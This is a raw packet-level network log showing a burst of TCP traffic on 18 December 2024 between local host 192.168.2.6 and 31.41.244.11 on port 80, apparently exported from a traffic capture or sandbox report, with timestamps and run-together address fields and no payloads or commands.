                                                                                                                                                              Dec 18, 2024 11:47:46.026902914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.026926994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.028135061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.028151035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.028167009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.028183937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.028218985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.030355930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.030371904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.030396938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.030420065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.030435085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.031670094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.031686068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.031701088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.031718016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.031735897 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.034006119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.034022093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.034037113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.034054995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.034085035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.034329891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.036283970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.036300898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.036319017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.036339998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.036356926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.037353039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.038480997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.038496971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.038531065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.038546085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.039726973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.039742947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.039758921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.039786100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.039830923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.040365934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.042143106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.042159081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.042180061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.042198896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.042229891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.043375969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.043390989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.043406010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.043422937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.043457031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.045572042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.045588017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.045603991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.045640945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.045661926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.046330929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.047919035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.047935009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.047951937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.047972918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.048012018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.049053907 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.049082994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.049099922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.049128056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.049350977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.049911022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.051419973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.051435947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.051450014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.051471949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.051492929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.052361965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.052517891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.182410955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.182431936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.182501078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.183938980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.183957100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.183970928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.184003115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.184022903 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.185393095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.185405016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.185417891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.185441971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.185467958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.186362982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.187362909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.187376022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.187416077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.188899994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.188911915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.188918114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.188982010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.189392090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.191262007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.191276073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.191288948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.191443920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.192559004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.192573071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.192584991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.192625046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.194276094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.194289923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.194333076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.195904970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.195919037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.195930958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.195955038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.195972919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.197273016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.197284937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.197298050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.197335005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.199434996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.199454069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.199466944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.199512005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.200800896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.200814009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.200825930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.200859070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.200881958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.203048944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.203068018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.203082085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.203114986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.203135967 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.204200983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.204212904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.204225063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.204255104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.204277039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.206383944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.206398964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.206442118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.207628012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.207640886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.207653046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.207680941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.207693100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.208941936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.208955050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.208966017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.208983898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.209012985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.210376978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.210391998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.210433960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.212331057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.212344885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.212357044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.212393045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.212408066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.213360071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.214629889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.214643002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.214658976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.214678049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.214704990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.215936899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.215950012 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.215960979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.215981960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.216012955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.217464924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.217478037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.217524052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.218374968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.218388081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.218439102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.220017910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.220031023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.220077038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.221275091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.221290112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.221333981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.222826958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.222842932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.222855091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.222875118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.222907066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.223953009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.223968983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.224013090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.225254059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.225270033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.225282907 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.225301981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.225337982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.226351023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.226864100 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.227045059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.227729082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.227742910 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.227775097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.227806091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.230370045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.230386019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.230432987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.231878042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.231890917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.231903076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.231935024 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.232873917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.232886076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.232897997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.232919931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.232935905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.234344959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.234359026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.234405994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.235671997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.235690117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.235701084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.235738039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.236905098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.236916065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.236927986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.236954927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.236970901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.238359928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.238373995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.238457918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.239258051 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.239270926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.239332914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.241571903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.241589069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.241600990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.241617918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.241646051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.242347956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.246371984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.246373892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.246403933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.246448040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.373786926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.373807907 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.373827934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.373847961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.373881102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.374742031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.374754906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.374766111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.374789000 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.374818087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.376427889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.376440048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.376451015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.376482010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.376512051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.377183914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.377229929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.377628088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.377705097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.377768993 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.377895117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.379960060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.379972935 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.379988909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.380033970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.380060911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.380361080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.380834103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.382345915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.382364035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.382376909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.382416964 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.382447004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.383577108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.383590937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.383603096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.383625031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.383655071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.385797977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.385814905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.385828018 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.385853052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.385869980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.387052059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.387087107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.387106895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.387139082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.387155056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.388302088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.388317108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.388365030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.388385057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.390501022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.390517950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.390530109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.390563965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.390579939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.391937017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.391951084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.391963005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.391987085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.392021894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.393954992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.393970966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.393985987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.394026995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.394042015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.395288944 CET804987831.41.244.11192.168.2.6
